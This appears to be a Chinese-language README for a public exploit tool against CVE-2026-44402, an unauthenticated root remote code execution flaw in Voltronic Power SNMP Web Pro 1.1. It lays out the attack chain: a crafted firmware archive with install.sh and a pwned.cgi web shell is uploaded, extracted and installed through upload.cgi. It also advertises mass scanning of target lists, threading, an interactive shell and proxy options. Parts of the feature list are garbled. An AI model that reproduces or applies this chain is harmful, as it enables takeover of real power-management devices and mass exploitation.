严重未认证远程代码执行漏洞(CVSS 9.8)— Voltronic Power SNMP Web Pro 1.1
该工具利用 CVE-2026-44402,这是 Voltronic Power SNMP Web Pro 1.1 设备中的一个漏洞,允许未认证攻击者通过 upload.cgi 端点上传恶意固件压缩包,并以 root 权限执行系统命令。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-44402 |
| CVSS 评分 | 9.8(严重) |
| CWE | CWE-434 — 危险类型文件的不受限制上传 |
| 受影响产品 | Voltronic Power SNMP Web Pro 1.1 |
| 是否需要认证 | 否(未认证) |
| 攻击向量 | 基于网络(远程) |
| 权限 | Root 级 RCE |
该漏洞存在于固件更新功能(upload.cgi)中。该端点:
创建恶意压缩包
upgrade/install.sh — 安装脚本upgrade/pwned.cgi — Web Shell上传压缩包 → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK"解压压缩包 → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK"安装 → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh 以 root 权限执行"ACK"Web Shell 激活 → POST /cgi-bin/pwned.cgi
cmd 参数执行命令 → 🚀-u)-f targets.txt)-t 20)— 快速并行处理--shell),支持 cd 命令url | output 格式--proxy)--timeout)-v)用于调试requests 和 prompt_toolkit 外无其他外部依赖# 克隆仓库
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py